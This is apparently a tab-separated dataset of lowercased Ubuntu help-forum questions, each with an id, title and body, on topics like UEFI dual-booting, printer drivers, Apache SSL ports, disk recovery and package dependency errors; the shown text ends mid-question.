326569	add directories to $ path without repeating yourself	my shell is zsh and os is ubuntu 13.04 i need to add directory to $ path to make it work in following places : in graphical environment ( unity ) ( such as startup applications , gmrun program that runs by shortcut ( it 's basically as `` run command '' on alt+f2 ) in terminal in unity in terminal on ctrl + alt + f1 i 've added it in .profile and it works for first two points , but not the last . i know i may add it to .zshrc but in this case it will be wrote in tow places ( violates dry ) and in the case of terminal inside unity it 'll be two times in $ path ( i do n't think it 's very bad but it 's at least not pretty ) if i add it only to .zshrc it works only for second and third cases ( obviously ) what can i do ?
326577	how to edit .eps files ?	how do you deal with editing vector files in ubuntu ? what programs could you recommend if there are any ?
326578	gnome classic minimizer tweak/similar desktop enviorment	i 've been using the gnome classic desktop environment for ubuntu 12.04 for a while now , and after installing conky , i 've realized that the taskbars make it look cluttered . are there any tweaking programs that can hide/remove/change the top or bottom taskbar , or a different desktop enviorment overall ? i 've tried openbox and xmonad , but i could never configure it right , so a more easily-configured environment would be nice , or just the gnome manipulator . ( note : i 've tried gnome-tweak , not extensive enough ) desktop :
326580	burg + uefi + win 8 multiboot	intro : after some trail and error i 've managed to install ubuntu 12.04 64bit on my win 8 preinstalled lenovo ideapad y500 . so far i 've had two problems : grub detected the windows 8 install as a recovery install ( already fixed this by adding a 15_windows file with a correct boot entry ) brightness does n't work . ( not too bothered by this . ) the problem i do n't really like how grub looks though . so i want to install burg . but win8 is under uefi ( and the bios is set to legacy support with the `` uefi first '' option set ) . i 've read about how this would work with arch , but how about ubuntu ? i 'd prefer pre-packaged burg ( ppa 's are fine with me ) . could somebody tell me how to setup burg with uefi and a custom entry ( and , possibly , how to hide the other entries in a submenu of sorts ) ? thanks to everybody who is willing to help ! edit : in reply of @ oldfred 's answer , i was already aware of refind , but my system failed the checks for ( u ) efi mode from the documentation ( although /sys/firmware/efi exists with plenty of subdirectories and files ) and i know my win8 install boots uefi mode . and i 've grown attached to the burg theme i use on my other non-uefi systems ( 3 laptops and 3 desktops ) , as well as the fact that arch has a efi-compat version of burg in it 's repos .
326584	kdenlive unable to show corectly or open folders or files with unicode names ( ex : arabic )	i was working on kdenlive correctly with out any problem in ubuntu 13.04 x32 . i use ubuntu13.04 x64 unity and installed kdenlive form software center . i ca n't open clip that has an arabic name or in a folder with arabic name . when i write a title clip in arabic and render a video .. i find nothing . i have ubuntu 13.04 x64 and kdenlive 0.9.6
326589	no webgl in chromium for radeon xpress 1250 ( rs600m ) in raring	before i say anything else , here 's my lspci response : $ lspci | grep 'vga' 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs600m [ radeon xpress 1250 ] i 'm running xubuntu , here 's the output of my release from shell : distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring the problem is that my generic drivers are working for the most part , but i do n't have opengl or webgl compatability on any browser . this is n't a huge problem , i 'm not really trying to use this laptop for much , but i am a web developer and was hoping this would be more stable than the win7 that was on it . ati/amd no longer support this particular device , i 've already downloaded the proprietary catalyst suite and run it , and got `` your device is not supported . '' are there any third-party or os drivers out there that will at the very least support webgl so i can test canvas/css3 in-browser ? here 's the output of my chrome : //gpu about the driver , btw : gl_version 2.1 mesa 9.1.3
326594	partial upgrade required , but ubuntu wants to delete packages i use	every time i have updates , ubuntu 12.04 demands a partial upgrade - but the partial upgrade insists on removing qgis and grass , two gis packages that i use . i do n't want to loose these packages ( which both work fine ) . how do i force ubuntu to leave them alone , without jeopardizing my security ? i also do not want to `` upgrade '' to anything newer than 12.04 . the last upgrade i had to make ( 10.04lts to 12.04lts ) required a few days work to eliminate the `` unity '' and get things working under an acceptable ( working ) gnome desktop - much of the ( private ) specialized software i use did n't like unity . ( i will never use unity , which i despise ! ) ( edit : this has been going on for maybe 2-3 months now , and is very irritating - and update manager now will not update the kernel without first doing a `` partial upgrade '' . )
326595	ubuntu one and simple http post ( or ftp ) upload ?	so my ubuntu laptop was stolen , which my security cams upload to . the cams do http or ftp postings ... so is there anyway to set up ubuntu one account to take http/ftp uploads from simple cameras ?
326597	enabling usbfs in ubuntu	how can i enable usbfs in ubuntu 13.04 ? i could not find the usb/devices file in default path , which is : /proc/bus/usb/devices
326598	removing kernel leftovers	i downloaded 3.11-rc3 kernels from kernel.org and built . even though i had 8 gb free space , somehow i ran out of space and i interrupted the installation at make modules step . now i would like to remove leftovers to gain more space , but could n't find where it installed all the files . how can i remove ? thanks .
326600	force reset of login details for facebook online account	earlier this week i had to reset my facebook password . online accounts requested me to grant access with the new login details ; i mis-typed the new password several times , and got redirected to a secondary authorization page where i finally typed it correctly . since then empathy has been unable to connect to facebook , and in fact telepathy-gabble has been crashing as a result . i reset my facebook password again , but this time did not even receive an authorization request from within online accounts/empathy . i 've also tried editing the password manually in the gnome keyring . however , empathy simply will not connect to facebook any more ( though there are no more telepathy-gabble crashes ) . is there any way to force online accounts to require me to re-authorize the account ? or any way , short of deleting the account , of fixing the current failure to log in ? i 'm using ubuntu 13.04 .
326601	wireless and ethernet , both are not working in ubuntu 12.04 & 12.10	i have installed ubuntu ( 12.04/12.10 ) as dual boot with windows 7 on dell inspiron 1545 laptop . in ubuntu 's both version , network connection is not detected for wireless and ethernet while on windows os , it is working fine . i checked for bcm43 kernal drivers , those are also not default installed . any help is really appreciated .
326611	dual boot system	i am using ubuntu 12.04 . can i install windows 7 and use it as a dual boot system . when i tried this earlier windows does n't detect ubuntu.is there any solution for this .
326614	need help for completely transfer in ubuntu	i use ubuntu 13.04 in dual boot with windows . i want to completely move into ubuntu . but i need some help . i am a freelance web designer . sometimes my clients send me psd files to make theme html or anything else . but i ca n't use photoshop in ubuntu . i know by using wine i can install photoshop . but i have dought that can i slice my psd layers in ubuntu as i do in windows . sometimes i have to create banner/button in photoshop . so i need a best solution for handling this type of problem . i hate windows so much . at the first when i used ubuntu 10.04 i am in love in ubuntu . so please help me to move in ubuntu . regards , mahbub alam
326617	apache ( and other services ) work on localhost , but not ip address	my apache server is working correctly on port 80 . when i try to enable ssl on port 443 , i can connect via localhost ( telnet localhost 443 ) but not via ip address ( telnet xxx.xxx.xxx.xxx 443 ) . to figure out where the problem is , i took my default port 80 config and changed the references to port 443 . same result . changed back to 80 and it works fine . which leads me to think there 's a firewall issue , not a config issue . but i have no firewall rules . also this site is working on a virtual machine with same linux version , 12.04 precise 64-bit under virtualbox . i tar the /etc/apache2 directory and put it on the amazon ec2 instance , i get the behavior described - port 80 works , 443 only localhost . i 'm not an expert , but not a newbie . stumped half the day , figured time to reach out , maybe others can help/benefit . am i missing something simple , or is there something new i have to do to open up port 443 ? ports.conf : namevirtualhost *:80 listen 80 listen 443 default-ssl in sites-enabled < virtualhost *:443 > servername mysite.mydomain.com:443 ... more irrelevant stuff note if i enable only default-ssl and just change 443 to 80 , it works so , that made me think there was no apache config issue , but some firewall issue . but i have no firewall enabled . ubuntu @ ip-xx-xx-xx-xx : /etc/apache2/sites-enabled $ sudo iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination nmap localhost vs. the ip address sudo nmap -st -o -pn xx.xx.xx.xx starting nmap 5.21 ( http : //nmap.org ) at 2013-07-30 13:53 edt nmap scan report for ec2-xx-xx-xx-xxx.compute-1.amazonaws.com ( xx.xx.xx.xx ) host is up ( 0.0013s latency ) . not shown : 996 filtered ports port state service 22/tcp open ssh 25/tcp closed smtp 80/tcp open http 3306/tcp closed mysql device type : general purpose running ( just guessing ) : linux 2.6.x ( 85 % ) aggressive os guesses : linux 2.6.15 - 2.6.26 ( 85 % ) no exact os matches for host ( test conditions non-ideal ) . os detection performed . please report any incorrect results at http : //nmap.org/submit/ . nmap done : 1 ip address ( 1 host up ) scanned in 9.56 seconds ubuntu @ ip-10-68-23-145 : /etc/apache2/sites-enabled $ sudo nmap -st -o -pn localhost nmap localhost starting nmap 5.21 ( http : //nmap.org ) at 2013-07-30 13:53 edt nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.000047s latency ) . not shown : 995 closed ports port state service 22/tcp open ssh 80/tcp open http 443/tcp open https 3306/tcp open mysql 9418/tcp open git no exact os matches for host ( if you know what os is running on it , see http : //nmap.org/submit/ ) . tcp/ip fingerprint : os : scan ( v=5.21 % d=7/30 % ot=22 % ct=1 % cu=42076 % pv=n % ds=0 % dc=l % g=y % tm=51f7fd9d % p= os : x86_64-unknown-linux-gnu ) seq ( sp=fd % gcd=1 % isr=10e % ti=z % ci=z % ii=i % ts=8 ) ops os : ( o1=m400cst11nw5 % o2=m400cst11nw5 % o3=m400cnnt11nw5 % o4=m400cst11nw5 % o5=m40 os:0cst11nw5 % o6=m400cst11 ) win ( w1=8000 % w2=8000 % w3=8000 % w4=8000 % w5=8000 % w6=80 os:00 ) ecn ( r=y % df=y % t=40 % w=8018 % o=m400cnnsnw5 % cc=y % q= ) t1 ( r=y % df=y % t=40 % s=o % a os : =s+ % f=as % rd=0 % q= ) t2 ( r=n ) t3 ( r=n ) t4 ( r=y % df=y % t=40 % w=0 % s=a % a=z % f=r % o= % rd=0 % os : q= ) t5 ( r=y % df=y % t=40 % w=0 % s=z % a=s+ % f=ar % o= % rd=0 % q= ) t6 ( r=y % df=y % t=40 % w=0 % s= os : a % a=z % f=r % o= % rd=0 % q= ) t7 ( r=y % df=y % t=40 % w=0 % s=z % a=s+ % f=ar % o= % rd=0 % q= ) u1 ( r= os : y % df=n % t=40 % ipl=164 % un=0 % ripl=g % rid=g % ripck=g % ruck=g % rud=g ) ie ( r=y % dfi=n % os : t=40 % cd=s ) network distance : 0 hops os detection performed . please report any incorrect results at http : //nmap.org/submit/ . nmap done : 1 ip address ( 1 host up ) scanned in 12.70 seconds lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise
326620	printing problem , canon lbp2900	i am using ubuntu 12.04 , 32bit . when i 'm printing nothing happen . i actually install my printer drivers , canon lbp2900 from canon site , its contain 2 *.deb file : cndrvcups-common_2.60-1_i386.deb cndrvcups-capt_2.60-1_i386.deb after installing them i done the following as suggested in forum : created the following directories : sudo mkdir /var/ccpd sudo mkfifo /var/ccpd/fifo0 sudo mkdir /var/captmon registered the printer : sudo /usr/sbin/lpadmin -p lbp2900 -m cncupslbp2900captk.ppd -v ccp : /var/ccpd/fifo0 -e register the printer with ccpd daemon : sudo /usr/sbin/ccpdadmin -p lbp2900 -o /dev/usb/lp0 start ccpd daemon : sudo /etc/init.d/ccpd start all steps was successfully and even my printer added to printer list in system setting and if i want to print sth it is available but when i print sth after some minuets i get this from printer state : `` idle - ccp send_data error , exit `` of course the printer is connected , when i enter lsusb in terminal it is in the list . and nothing will happen next just the jobs are in queue . the posts that i used : printing canon lbp2900 problems http : //www.unixmen.com/installation-canon-lbp2900-on-linux/ https : //wiki.archlinux.org/index.php/canon_lbp2900 thanks , fari
326622	ca n't print from libre office 4	recently i bought a new printer , a canon pixma ip7250 which connects via wi-fi . i installed it using the supplied canon drivers for linux and i can print wirelessly without problem from every program in ubuntu except libre office . when i try to print a document ( either existing or new , either a .odt or a .doc ) the printer icon shows for about 10 seconds and then disappears . going into ‘view print queue’ and looking at the document i just tried to print , it says ‘job completed’ , but when i press the refresh button it momentarily says ‘printer not found’ . if i save the document as a pdf , it prints fine from pdf viewer , but this can only be a temporary workaround . i also have the same version of libre office on an old windoze machine running xp and i can print from that without any problem , so this must be an ubuntu issue . i am running 13.04 . i have looked both in the printer settings and the printer settings within libre office and can not see anything untoward . in have also searched the internet via duck duck go and even , in desperation , used messrs page & brin’s search engine , but i could not find anything on this particular issue . i would be very grateful for any advice on this issue , as i tend to print more from libre office than any other program . thanks
326624	how to get qml syntax highlighting in gedit ?	qml files opened with gedit do n't have syntax highlighting . is there a package providing a gtksourceview lang.spec file for qml ? if not , has anyone written a lang.spec than can be installed locally ?
326627	cpu overheating ( acer 4730z + ubuntu 12.10 )	after using the pre-installed windows vista on my acer aspire 4730z for over 4 years , i decided to switch to ubuntu . i installed a brand new ssd with ubuntu 12.04 , which i later upgraded to 12.10 . everything works fine , except for the fact that the cpu gets very hot . this problem exists under 12.04 and 12.10 . it did not exist under windows vista . -idle temperature is around 55 degrees celcius ( @ about 2-3 % cpu usage ) -when watching 1080p video ( cpu usage around 50 % ) it can get up to 90 degrees celcius my only guess is that it might have something to do with the integrated graphics ( if i check under system > details , it says `` graphics : unknown '' ) . other than that , i do n't have a clue . any ideas ? some quick specs : intel® pentium® dual-core mobile processor t3200 ( 1 mb l2 cache , 2.0 ghz , 667 mhz fsb , 35 w ) , supporting intel® 64 architecture mobile intel® gl40 express chipset mobile intel® gl40 express chipset with integrated 3d graphics , featuring intel® graphics media accelerator 4500m ( intel® gma 4500m ) with up to 1759 mb of intel® dynamic video memory
326628	`` office '' but no office in finger	$ finger myname login : myname name : my name directory : /home/myname shell : /bin/bash office : some custom text on since logintime on pts/1 from loginbox 1 second idle last login oldlogintime on pts/4 from oldloginbox no mail . no plan . you can see i 've set my office to some custom text . however : $ finger login name tty idle login time office office phone myname my name pts/1 logintime ( loginbox ) this does n't show my office , but does have the office header . should it show my office ? if so , what might be the reason it does n't ? if it should n't , why is the header there ?
326629	need help about using ubuntu server	i am using ubuntu in dual boot with windows . i decide to completely move into ubuntu . but a little problem occurs . i am learning to manage server so i am working with a vps . in windows to login ssh i use putty . but i need to know for ubuntu how i can login ssh ? regards , mahbub
326632	how do i download ubuntu and get rid of my old os ?	i have a net book with windows 7 starter and i downloaded ubuntu on my usb drive , since i do n't have a disk drive . and i want to install it and delete windows all at the same time , because i do n't think it will have the processing capacity to to have both at the same time . anyway to do that ?
326634	dualboot windows 8 uefi and ubuntu 13.04 64-bit	i am trying to dualboot windows 8 and ubuntu 13.04 64-bit . windows 8 is installed in uefi mode with secure boot disabled . to install ubuntu i followed this guide : http : //www.linuxbsdos.com/2013/03/12/dual-boot-windows-8-and-ubuntu-12-04-in-uefi-mode/ when ubuntu was installed the windows bootloader should have been overwritten and the system would automatically boot into ubuntu . that wa n't the case for me . for me i booted into windows without being able to choose os . i followed the guide anyway and downloaded easybcd 2.2 and added an entry for ubuntu in the win8 bootloader . when rebootin and choosing ubuntu i get a black screeen with white text and an error message about things missing . any ideas ? this may have been answered but i have tried google and have not found anything that helps me . i 'm new to linux/ubuntu .
326635	devices by 100 % usage - how can i solve this problem ?	i have a lenovo thinkpad e530 laptop . some device have 100 % usage in it . the results of powertop are in below : usage device name 10.8 % cpu use **100.0 % audio codec hwc0d0 : conexant 100.0 % audio codec hwc0d3 : intel** 40.0 % display backlight 11.0 % display backlight 206.2 pkts/s network interface : eth0 ( r8169 ) 162.6 pkts/s nic : ppp0 **100.0 % pci device : intel corporation ivy bridge dram controller 100.0 % pci device : broadcom corporation bcm4313 802.11b/g/n wireless lan controller 100.0 % pci device : intel corporation panther point high definition audio controller 100.0 % pci device : intel corporation panther point pci express root port 1 100.0 % pci device : intel corporation panther point mei controller # 1 100.0 % pci device : intel corporation ivy bridge graphics controller 100.0 % usb device : ehci host controller 100.0 % usb device : usb-device-8087-0024 100.0 % pci device : intel corporation panther point pci express root port 2 100.0 % pci device : intel corporation panther point usb enhanced host controller # 2 100.0 % pci device : intel corporation panther point pci express root port 4 100.0 % pci device : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller 100.0 % pci device : intel corporation ivy bridge pci express root port 100.0 % pci device : intel corporation panther point pci express root port 3 100.0 % pci device : intel corporation panther point usb xhci host controller 100.0 % pci device : intel corporation panther point 6 port sata controller [ ahci mode ] 100.0 % usb device : touchstrip fingerprint sensor ( upek ) 100.0 % pci device : intel corporation panther point usb enhanced host controller # 1 100.0 % usb device : usb optical mouse** 0.0 pkts/s network interface : wlan0 ( brcmsmac ) 0.0 rpm laptop fan 0.0 % radio device : thinkpad_acpi 0.0 % radio device : brcmsmac 0.0 % usb device : integrated camera ( c6jc9fcav ) 0.0 % usb device : usb-device-8087-0024 0.0 % usb device : xhci host controller 0.0 % usb device : xhci host controller 0.0 % usb device : ehci host controller how can i solve this problem ?
326637	why my google chrome extensions stopped working ?	i just installed ubunt 13.04 on my pc and everything seems to be working great . the only thing is that google chrome 's ( not chromiun ) extensions just stopped working . all the icons were replaced by a puzzle piece and they do n't responde . also if i click `` update extensions now '' nothing happens is there any way to fix them ?
326644	empathy authorization ubuntu	i have a question to the developers of ubuntu , can someone answer me . one ! why is all this additional authorization in gnome shell for ubuntu as in other distributions empathy works perfectly without it . secondly do you need a daily authorize ubuntu to use empathy in gnome shell is a punishment for it that i do not want to use this invention called the unity sorry for the harsh tone , but it is annoying , it is constantly reprimanding for authorization for ubuntu to use empathy !
326650	where can i find out if a graphics card will work on the newest versions of ubuntu ?	i 'm really a newbie at graphics cards and have no clue anything about them . i want to surprise my dad for his birthday with a fairly nice graphics card as his old one does n't work with new versions of ubuntu . he can not run unity at all and he wishes to . he has a dell xps 410 desktop . i 'm looking for a card that will run ubuntu 13 and future versions . he does n't play any games , he surfs the web constantly . i do n't have a lot of money , 300 $ is my limit for this card . i 've looked through the hardware supported but as i 'm not really good at an of this i have no idea what it means . could someone just suggest a few good cards ? thanks ! !
326652	unable to download ubuntu-12.04.2-server-amd64.iso	i downloaded ubuntu-12.04.2-server-amd64 a couple of weeks ago with file size 687mb with md5 hash = af5f788aee1b32c4b2634734309cc9e9 . today when i download it is 656mb and it does not install . i 've downloaded via different mirrors and different isps but still the same problem . what 's going on ?
326653	how do i make an input method for my conlang	i am trying to make an input method for my constructed language , and have no idea where to start . i have n't found any helpful information on any forums . i am trying to make a syllabic language , so i would need it to work similarly to a japanese input method . type english letter combination like `` tsu '' , get `` ă¤ '' .
326654	can not install wine windows platform loader both from terminal and software center	i recently installed ubuntu 13.04 on my pc . i want to install microsoft visual studio 2010 , so i tried to install wine . i tried to install from the terminal and from the software center . both times , it failed in the middle of process . this is the error . w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring/main/source/sources 404 not found w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring/restricted/source/sources 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . how can i fix this ?
326658	how can i convert a ttyrecord file in a .gif file ?	using ttyrec i can record any console program ( ttyrec invokes a shell and records the session until the shell exits ) . the record is saved by default in a ttyrecord file and can be played using ttyplay ttyrecord command . now , i want to convert this ttyrecord file in a .gif file . i found this phyton script ( tty2gif.py ) , but , no matter how i do , i can not manage to make it to work ... any other solutions will be appreciated !
326662	which partition to select as device for boot loader in an efi mode install ?	i 'm trying to install ubuntu 13.04 alongside windows 8 ( to dual boot ) on my new laptop . since there is already an efi partition on the disk , i did n't create another one ( as suggested in : https : //help.ubuntu.com/community/uefi # creating_an_efi_partition ) and i selected /dev/sda3 as the device for boot loader installation . after the installation , ubuntu worked fine but i could n't boot into windows 8 ( when i select the win8 in grub screen it gives an error message ) . i restored computer to factory state using recovery and now trying to install ubuntu again . which partition should i choose for `` device for boot loader installation '' ? thanks for the answers . harddisk is partitoned like this :
326665	cant mount drive , could this be a zero-length partition ?	sudo mount /dev/sdc1 /media/k mount : /dev/sdc1 : ca n't read superblock sudo mkfs.ext4 -n /dev/sdc mke2fs 1.42 ( 29-nov-2011 ) /dev/sdc is entire device , not just one partition ! proceed anyway ? ( y , n ) y filesystem label= os type : linux block size=4096 ( log=2 ) fragment size=4096 ( log=2 ) stride=0 blocks , stripe width=0 blocks 183148544 inodes , 732566646 blocks 36628332 blocks ( 5.00 % ) reserved for the super user first data block=0 maximum filesystem blocks=4294967296 22357 block groups 32768 blocks per group , 32768 fragments per group 8192 inodes per group superblock backups stored on blocks : 32768 , 98304 , 163840 , 229376 , 294912 , 819200 , 884736 , 1605632 , 2654208 , 4096000 , 7962624 , 11239424 , 20480000 , 23887872 , 71663616 , 78675968 , 102400000 , 214990848 , 512000000 , 550731776 , 644972544 testdisk analyzed gpt and one partition , but after and deep search in analyze , the disk seems to be dead `` read i/o error '' jul 31 00:19:24 morteza-system-product-name kernel : [ 7970.066739 ] ata3.00 : configured for udma/133 ( device error ignored ) jul 31 00:19:24 morteza-system-product-name kernel : [ 7970.066770 ] sd 2:0:0:0 : [ sdc ] result : hostbyte=did_ok driverbyte=driver_sense jul 31 00:19:24 morteza-system-product-name kernel : [ 7970.066779 ] sd 2:0:0:0 : [ sdc ] sense key : aborted command [ current ] [ descriptor ] jul 31 00:19:24 morteza-system-product-name kernel : [ 7970.066788 ] descriptor sense data with sense descriptors ( in hex ) : jul 31 00:19:24 morteza-system-product-name kernel : [ 7970.066793 ] 72 0b 00 00 00 00 00 0c 00 0a 80 00 00 00 00 00 jul 31 00:19:24 morteza-system-product-name kernel : [ 7970.066810 ] 00 00 00 00 jul 31 00:19:24 morteza-system-product-name kernel : [ 7970.066818 ] sd 2:0:0:0 : [ sdc ] add . sense : no additional sense information jul 31 00:19:24 morteza-system-product-name kernel : [ 7970.066827 ] sd 2:0:0:0 : [ sdc ] cdb : read ( 10 ) : 28 00 00 00 00 00 00 00 08 00 jul 31 00:19:24 morteza-system-product-name kernel : [ 7970.066843 ] end_request : i/o error , dev sdc , sector 0 jul 31 00:19:24 morteza-system-product-name kernel : [ 7970.066879 ] ata3 : eh complete anyone for ... 3 tb music collection : ( im not able now to put some picture cause of the forum policy . : ( sudo fsck.ext4 -b 102400000 -b 4096 /dev/sdc1 e2fsck 1.42 ( 29-nov-2011 ) fsck.ext4 : bad magic number in super-block while trying to open /dev/sdc1 the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > why its show ext2 filesystem damn . this is the mount commands output sudo mount /dev/sdc1 /media/k mount : wrong fs type , bad option , bad superblock on /dev/sdc1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so this is syslog output when i try to mount the volume jul 31 18:04:29 morteza-system-product-name kernel : [ 709.317917 ] ata3.00 : exception emask 0x0 sact 0x1 serr 0x0 action 0x0 jul 31 18:04:29 morteza-system-product-name kernel : [ 709.317926 ] ata3.00 : irq_stat 0x40000008 jul 31 18:04:29 morteza-system-product-name kernel : [ 709.317934 ] ata3.00 : failed command : read fpdma queued jul 31 18:04:29 morteza-system-product-name kernel : [ 709.317949 ] ata3.00 : cmd 60/08:00 : c2:02:00/00:00:00:00:00/40 tag 0 ncq 4096 in jul 31 18:04:29 morteza-system-product-name kernel : [ 709.317952 ] res 41/40:00 : c8:02:00/00:00:00:00:00/40 emask 0x409 ( media error ) < f > jul 31 18:04:29 morteza-system-product-name kernel : [ 709.317959 ] ata3.00 : status : { drdy err } jul 31 18:04:29 morteza-system-product-name kernel : [ 709.317965 ] ata3.00 : error : { unc } jul 31 18:04:29 morteza-system-product-name kernel : [ 709.329953 ] ata3.00 : configured for udma/133 jul 31 18:04:29 morteza-system-product-name kernel : [ 709.329974 ] ata3 : eh complete jul 31 18:04:30 morteza-system-product-name kernel : [ 710.362452 ] ext3-fs ( sdc1 ) : error : no journal found here is fdisk -l output disk /dev/sda : 32.0 gb , 32017047552 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001a10f device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 23619583 11706368 7 hpfs/ntfs/exfat /dev/sda3 23621630 62531583 19454977 5 extended /dev/sda5 23621632 62531583 19454976 83 linux warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 3907029167 1953514583+ ee gpt warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdc : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . warning : gpt ( guid partition table ) detected on '/dev/sdd ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdd : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdd1 1 3907029167 1953514583+ ee gpt disk /dev/sde : 8076 mb , 8076132352 bytes 249 heads , 62 sectors/track , 1021 cylinders , total 15773696 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000c2243 device boot start end blocks id system /dev/sde1 * 62 15762197 7881068 c w95 fat32 ( lba )
326667	bluetooth issue	i have been using ubuntu for around 6 months and i am having an issue with bluetooth . i have a bluetooth dongle on my pc and bought some bluetooth speakers . i have paired the devices but when i try to connect using bluetooth manager - it says stream setup failed . i have browsed the internet for hours and ca n't get it to work . i did have it working when i first bought the speakers but i ca n't get it working again now . it works on my windows laptop and android phone just not ubuntu . i also can not see bluetooth as an output for sound , again this was working when i first used it , but i jsut can not get it working again . i am using ubuntu 13.04 i consider myself to be a ubuntu novice , any help or advice would be greatly appreciated thanks
326669	ftp project manager with `` upload on save '' function	i am looking for ftp project manager with `` upload on save '' function . i was trying to work with filezilla , netbean & phpstorm ( that download all remote files to local machine - i do n't need it ) , and i really do n't like it ... i am looking something like php designer on windows ... any ideas ? thanks anyway
326670	how do i get ubuntu working on a nexus 7 ( 2013 ) ?	can anyone tell me whether the information at `` https : //wiki.ubuntu.com/nexus7/installation '' still holds for the 2nd generation nexus 7 ? i 'm thinking that there may be new compatibility issues , since the hardware/chipset changed . if the images do n't work for nexus 7 ( 2013 ) , are there any plans to migrate to and support this device ? thanks for any help and advice .
326672	after hibernation ( 12.04.2 ) sometimes when system wakes up grub menu is displayed instead of clean wake	here are few details : 1 ) i have installed laptop-mode-tools to enable auto-hibernation on low battery ( and enabled auto-hibernation ) 2 ) my system is encrypted 3 ) laptop is acer aspire 1 d257-13848 to test hibernation on command line prompt i call pm-hibernate ( as root ) . most of the times wake works beautifully , prompting me for encrypt phrase and restarting properly . from time to time unfortunately grub menu is shown with 4 choices ( linux , linux recovery , memtest ) . on grub menu , system does not timeout on 1st choice , but waits for manual selection . if the 1st item is chosen , it appears that it wakes up properly asking for encryption phrase and completing wake up . help would be appreciated . ( * ) installing laptop-mode-tools does not make a difference for above .
326680	ca n't see system drive sda1	i ca n't see my `` c '' drive any more ( excuse the dos notation ) it does n't show up in my home folder.the drive is partitioned into a 30gb root and the rest reserved for data none of it shows up in my home folder . i think it was there originally but somehow has disappeared .
326681	php5-fpm ( php 5.5 ) wo n't install - ca n't install libsystemd-daemon0	my server is down because i do n't know how to fix this . i 'm on ubuntu 12.04 i use this php5 repository : http : //ppa.launchpad.net/ondrej/php5/ubuntu precise main i 've never had a problem until today . a few hours ago , i did an apt-get upgrade and everything went fine until it reached the php5-fpm portion : the following packages have unmet dependencies : php5-fpm : depends : libsystemd-daemon0 ( > = 31 ) but it is not installable e : unable to correct problems , you have held broken packages . i tried to install libsystemd-daemon0 but i get a notice that it has no installation candidate . can someone tell me how to fix this without me pulling what 's left of my hair out ?
326689	virtual box 4.2 does not install in ubuntu 13.04	i need to run windows apps in ubuntu 13.04 but everything is going wrong . i tried to install wine but it failed . giving up and switching to virtual box did not help either . i downloaded virtualbox 4.2 and when tried to install through software center it gives error '' dependency is not satisfiable : libsdl1.2debian ( > =1.2.11 )
326691	bittorrent is unchosen how to choose it as default software for torrent download ?	in ubuntu 12.04 , how can i choose transmission as the default bittorrent client ? somehow i unchose it .
326700	update error ubuntu 13.04 error : brokencount > 0	hi am updating my ubuntu 13.04 installation with a error : brokencount > 0 error any ideas on how to resolve this ? ? output from sudo apt-get -f install copied and pasted eugene @ eugenelinuxbox : ~ $ sudo apt-get -f install [ sudo ] password for eugene : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : gir1.2-json-1.0 gir1.2-timezonemap-1.0 gir1.2-xkl-1.0 gksu kde-l10n-engb libgksu2-0 linux-headers-3.8.0-19 linux-headers-3.8.0-19-generic linux-image-3.8.0-19-generic linux-image-extra-3.8.0-19-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : chromium-browser suggested packages : webaccounts-chromium-extension unity-chromium-extension the following packages will be upgraded : chromium-browser 1 upgraded , 0 newly installed , 0 to remove and 14 not upgraded . 2 not fully installed or removed . need to get 0 b/31.8 mb of archives . after this operation , 3,507 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 242635 files and directories currently installed . ) preparing to replace chromium-browser 28.0.1500.52-0ubuntu1.13.04.3 ( using ... /chromium-browser_28.0.1500.71-0ubuntu1.13.04.1_i386.deb ) ... unpacking replacement chromium-browser ... dpkg-deb ( subprocess ) : decompressing archive member : lzma error : compressed data is corrupt dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing 